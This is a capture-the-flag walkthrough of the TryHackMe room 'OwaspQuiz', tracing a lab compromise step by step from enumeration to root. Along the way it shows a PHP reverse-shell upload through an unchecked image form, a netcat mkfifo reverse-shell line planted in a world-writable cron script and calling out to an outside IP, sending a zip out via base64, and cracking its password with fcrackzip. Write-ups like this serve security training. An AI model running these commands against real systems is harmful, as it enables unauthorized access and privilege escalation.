OwaspQuiz - HackMD

# OwaspQuiz ![](https://i.imgur.com/DLZX3aT.png) -- - username: [hashghost](https://tryhackme.com/p/hashghost) -- - [ToC] This room was created by [peterchain](https://peterchain7.github.io/) on [trychckme](https://tryhackme.com/room/owaspquiz) platform it's difficulty level was easy. -- - Lets start with enumerations as it was proposed -- - ## nmap scan -- - ``` nmap -sC -sV 10.10.176.162 -oN nmap-scan ``` ``` ┌──(gemstone㉿kali)-[~/C7F5/thm/chain] └─$ cat nmap-scan # Nmap 7.92 scan initiated Sat May 14 17:02:25 2022 as: nmap -sC -sV -oN nmap-scan 10.10.176.162 Nmap scan report for 10.10.176.162 Host is up (0.17s latency). Not shown: 994 filtered tcp ports (no-response) PORT STATE SERVICE VERSION 20/tcp closed ftp-data 21/tcp open ftp vsftpd 3.0.3 22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 f0:c0:cd:b4:9a:8d:c9:8d:3e:59:0a:a6:f6:90:98:f7 (RSA) | 256 17:b2:38:4d:f0:d5:d3:4a:a9:15:96:88:aa:d8:25:2b (ECDSA) |_ 256 38:99:59:33:67:ea:c6:e6:24:be:62:70:12:ec:3e:ac (ED25519) 80/tcp open http Apache httpd 2.4.29 ((Ubuntu)) |_http-title: home - Welcome |_http-server-header: Apache/2.4.29 (Ubuntu) 443/tcp closed https 3306/tcp closed mysql Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . # Nmap done at Sat May 14 17:02:52 2022 -- 1 IP address (1 host up) scanned in 27.20 seconds ``` -- - Then this is web, it is running on port 80 and it is open. It contains some other ports open but they can not help us for now. -- - ## Gobuster scan -- - ``` gobuster dir -u http://10.10.176.162/ -w /usr/share/wordlists/seclists/Discovery/Web-Content/raft-small-directories.txt -t 40 -f -x php -o gobuster ``` -- - **Results** ``` ┌──(gemstone㉿kali)-[~/C7F5/thm/chain] └─$ cat gobuster /uploads/ (Status: 200) [Size: 59] /assets/ (Status: 200) [Size: 1116] /gallery.php (Status: 200) [Size: 4354] /admin/ (Status: 200) [Size: 3991] /images/ (Status: 200) [Size: 1936] /index.php (Status: 200) [Size: 16312] /icons/ (Status: 403) [Size: 278] /server-status/ (Status: 403) [Size: 278 ``` -- - Here we have some useful directories but we can continue to bruteforce recusively with additional option which will help us to bruteforce other directories. -- - ``` gobuster dir -u http://10.10.176.162/admin -w /usr/share/wordlists/seclists/Discovery/Web-Content/raft-small-directories.txt -t 40 -f -x php -o gobuster-admin ``` -- - **Results** ``` ┌──(gemstone㉿kali)-[~/C7F5/thm/chain] └─$ cat gobuster-admin /assets/ (Status: 200) [Size: 2090] /home.php (Status: 302) [Size: 8846] [--> logout.php] /logout.php (Status: 302) [Size: 0] [--> index.php] /index.php (Status: 200) [Size: 3991] /header.php (Status: 302) [Size: 4] [--> logout.php] /slider.php (Status: 200) [Size: 22426] ``` -- - Here we get some usefull directories attached to the admin directory. If we try to visit this directory we will find some valuable details but the most intended directory will be `/admin/slider.php` -- - **Visit the admin/slider.php** In this page we can upload file and instructions specifies that it is image upload, but what if we can upload any file example a php file with malicious codes which can give us reverse shell. -- - ![](https://i.imgur.com/59NR64f.png) -- - Then i decided to upload the [pentestmonkey](https://github.com/pentestmonkey/php-reverse-shell/blob/master/php-reverse-shell.php) php reverse shell which will give us a reverse shell. -- - :::info Before uploadding a reverse shell payload from pentestmonkey make sure you are listenning with netcat through the following ::: -- - ``` ┌──(gemstone㉿kali)-[~/C7F5/thm/chain] └─$ nc -nvlp 1234 listening on [any] 1234 ... ``` -- - After uploading it it will prompt the following message ![](https://i.imgur.com/G76WtKR.png) -- - Then for us to get the shell we have to make sure that the php reverse shell payload is executing and this can be done by know/identify where excatly the script is uploaded. On the image above it seems the slider has been added to gallery and in the dir bruteforcing we got `gallery.php` so we will go to that page and refresh it. -- - ![](https://i.imgur.com/09IOZ9e.png) -- - And on our netcat we have a shell ![](https://i.imgur.com/yIEkAbn.png) **We are in.** -- - ## Stabilize shell. -- - Now we have shell but it is not stable, meaning if we press ctr+c the shell will disappear and here are the steps to stabilize it. -- - ``` $ python -c 'import pty;pty.spawn("/bin/bash")' batman@owaspQuiz:/$ export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/tmp <l/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/tmp batman@owaspQuiz:/$ export TERM=xterm-256color alias ll='ls -lsaht --color=auto'export TERM=xterm-256color batman@owaspQuiz:/$ batman@owaspQuiz:/$ ^Z zsh: suspended nc -nvlp 1234 ┌──(gemstone㉿kali)-[~/C7F5/thm/chain] └─$ stty raw -echo;fg;reset [1] + continued nc -nvlp 1234 batman@owaspQuiz:/$ ``` -- - Then we are good now and can continue with privilege escaltion. -- - Check whoami with which commands we can run with sudo. ![](https://i.imgur.com/QNu61Ca.png) Then we can not view because the batman requires password and we don't have. -- - Then we will check some other interesting files including flags. ![](https://i.imgur.com/YtO4vsr.png) -- - After listing some folders we discovered that they are two users in our machine user `batman` and user `munojr` -- - On munojr home's directory there is our first flag then we will try to read it. ![](https://i.imgur.com/pHEL629.png) We can not read the file then lets check the cron jobs. -- - ## User privilege escalation. -- - ``` batman@owaspQuiz:/home/munojr$ cat /etc/crontab # /etc/crontab: system-wide crontab # Unlike any other crontab you don't have to run the `crontab' # command to install the new version when you edit this file # and files in /etc/cron.d. These files also have username fields, # that none of the other crontabs do. SHELL=/bin/sh PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin # m h dom mon dow user command 17 * * * * root cd / && run-parts --report /etc/cron.hourly 25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily ) 47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly ) 52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly ) * * * * * munojr /opt/munoupdate.sh # batman@owaspQuiz:/home/munojr$ ``` Interesting there is a script in crontab which runs in every minute and it has named as `munoupdate.sh` -- - Lets read the file permission and check if we can write it ```console batman@owaspQuiz:/home/munojr$ ls -l /opt/munoupdate.sh -rwxr-xrwx 1 munojr munojr 845 May 13 15:05 /opt/munoupdate.sh ``` Bravo!! we can write on the script then lets read first before changing it. -- - ``` batman@owaspQuiz:/home/munojr$ cat /opt/munoupdate.sh rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 172.17.17.62 8000 >/tmp/f #!/bin/bash startupdate() { echo echo "-----------------------------------------" echo ">>> Command Execting Was Successful. <<<" echo "-----------------------------------------" echo } start() { echo echo "***>>> Updating The Operating System <<<***" echo } exitUpdate() { echo echo "-------------------------------------------------------" echo ">>> Operating System Update Has Been Completed <<<" echo "-------------------------------------------------------" echo exit 1 } #calls the functions start startupdate exitUpdate ``` -- - This script has some update functions but there is reverse shell payload ``` rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 172.17.17.62 8000 >/tmp/f ``` -- - We can use the payload and listen for the munojr shell, in my case i changed into the following ip address ``` rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.9.11.230 1122 >/tmp/f ``` and then listening to with netcat. -- - :::info When you start netcat you have to wait for one minute so that you can have a reverse shell. ::: -- - ``` ┌──(gemstone㉿kali)-[~/C7F5/thm/chain] └─$ nc -nvlp 1122 listening on [any] 1122 ... connect to [10.9.11.230] from (UNKNOWN) [10.10.8.200] 52262 /bin/sh: 0: can't access tty; job control turned off $ ``` We now have a shell then we will stabilize as usual and after it lets read the user.txt file first. -- - ``` munojr@owaspQuiz:~$ ls todo.txt user.txt munojr@owaspQuiz:~$ cat user.txt THM{REDACTED} ``` Now we are half of the journey lets continue to the escalation to root user. -- - ## Root privilege escalation. -- - On munojr home directory they were two files and we read only user.txt then lets read todo.txt file ``` munojr@owaspQuiz:~$ cat todo.txt Hey; munojr I want you to automate system updates, kindly make sure our script is secure!! regards peterChain!! Your current password is : [Redacted] ``` -- - This was a message showing that there is a file that have a password for root user. -- - Then after seeing this message i decided to check for the `/var/backups` file. ``` munojr@owaspQuiz:~$ cd /var/backups/ munojr@owaspQuiz:/var/backups$ ls s3cr3t.zip munojr@owaspQuiz:/var/backups$ ``` -- - Lets unzip it. ``` munojr@owaspQuiz:/var/backups$ unzip s3cr3t.zip Archive: s3cr3t.zip checkdir error: cannot create munojr Permission denied unable to process munojr/. [s3cr3t.zip] munojr/rootpass.txt password: ``` -- - It failed to unzip because it requires password and we do not have munojr's password. Lets crack it but we have to send it first to **our machine(your computer)**. I tried to send it with python3 server it failed then i decided to use base64 method with command. -- - ``` base64 -w0 s3cr3t.zip ``` ![](https://i.imgur.com/gKmBvqL.png) Then copy it to your machine and save it with .zip extension mine was **s3cr3t.zip** -- - ## Bruteforcing password -- - ``` ┌──(gemstone㉿kali)-[~/C7F5/thm/chain] └─$ fcrackzip -u -v -D -p /usr/share/wordlists/rockyou.txt s3cret.zip 'munojr/' is not encrypted, skipping found file 'munojr/rootpass.txt', (size cp/uc 47/ 35, flags 9, chk 833c) checking pw 055470056 PASSWORD FOUND!!!!: pw == ******* ``` -- - unzip the s3cret.txt ``` ┌──(gemstone㉿kali)-[~/C7F5/thm/chain] └─$ unzip s3cret.zip Archive: s3cret.zip creating: munojr/ [s3cret.zip] munojr/rootpass.txt password: extracting: munojr/rootpass.txt ┌──(gemstone㉿kali)-[~/C7F5/thm/chain] └─$ cd munojr ┌──(gemstone㉿kali)-[~/C7F5/thm/chain/munojr] └─$ ls rootpass.txt ┌──(gemstone㉿kali)-[~/C7F5/thm/chain/munojr] └─$ cat rootpass.txt root:*********** ``` -- - now we have root password then we can be root by just `su root` and password will be the one we get from rootpass.txt. ``` munojr@owaspQuiz:~$ su root Password: root@owaspQuiz:/home/munojr# cd /root root@owaspQuiz:~# ls root.txt root@owaspQuiz:~# cat root.txt THM{REDACTED} root@owaspQuiz:~# ``` -- - **The End**. -- - Thanks for reading, you can check me on [twitter](https://twitter.com/hashghost101).see you next time. -- -